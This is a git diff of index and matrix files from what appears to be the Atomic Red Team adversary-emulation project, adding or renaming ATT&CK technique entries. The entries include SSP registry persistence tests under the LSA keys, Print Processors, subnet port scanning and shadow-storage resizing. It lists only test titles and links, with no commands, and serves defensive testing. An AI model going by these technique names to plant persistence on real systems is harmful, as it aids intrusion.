- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -619,7 +621,8 @@
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- - Atomic Test #1: Modify SSP configuration in registry [windows]
+ - Atomic Test #1: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry [windows]
+ - Atomic Test #2: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry [windows]
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
@@ -925,7 +928,8 @@
- Atomic Test #5: Remote Service Installation CMD [windows]
- [T1137 Office Application Startup](../../T1137/T1137.md)
- Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
-- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md)
+ - Atomic Test #1: Print Processors [windows]
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -965,7 +969,8 @@
- T1062 Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- - Atomic Test #1: Modify SSP configuration in registry [windows]
+ - Atomic Test #1: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry [windows]
+ - Atomic Test #2: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry [windows]
- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1131 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1110,7 +1115,7 @@
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
-- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
@@ -1714,6 +1719,7 @@
- Atomic Test #6: WinPwn - MS17-10 [windows]
- Atomic Test #7: WinPwn - bluekeep [windows]
- Atomic Test #8: WinPwn - fruit [windows]
+ - Atomic Test #10: Port-Scanning /24 Subnet with PowerShell [windows]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
@@ -1778,6 +1784,7 @@
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- Atomic Test #8: Windows - Disable the SR scheduled task [windows]
- Atomic Test #9: Disable System Restore Through Registry [windows]
+ - Atomic Test #10: Windows - vssadmin Resize Shadowstorage Volume [windows]
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index cbcc93a0..e6b64728 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -24,7 +24,7 @@
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
+| | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Kubernetes Exec Into Container](../../T1609/T1609.md) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Video Capture](../../T1125/T1125.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [File and Directory Discovery](../../T1083/T1083.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -32,7 +32,7 @@
| | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
| | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | [Data from Network Shared Drive](../../T1039/T1039.md) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Process Discovery](../../T1057/T1057.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Encrypted Channel](../../T1573/T1573.md) | |
+| | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Encrypted Channel](../../T1573/T1573.md) | |
| | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Process Injection](../../T1055/T1055.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Software Deployment Tools](../../T1072/T1072.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hide Artifacts](../../T1564/T1564.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
@@ -153,7 +153,7 @@
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | | DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
-| | | Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index d76edfeb..763f3472 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -16,11 +16,11 @@
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [System Information Discovery](../../T1082/T1082.md) | [Software Deployment Tools](../../T1072/T1072.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [Application Window Discovery](../../T1010/T1010.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
+| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [Application Window Discovery](../../T1010/T1010.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
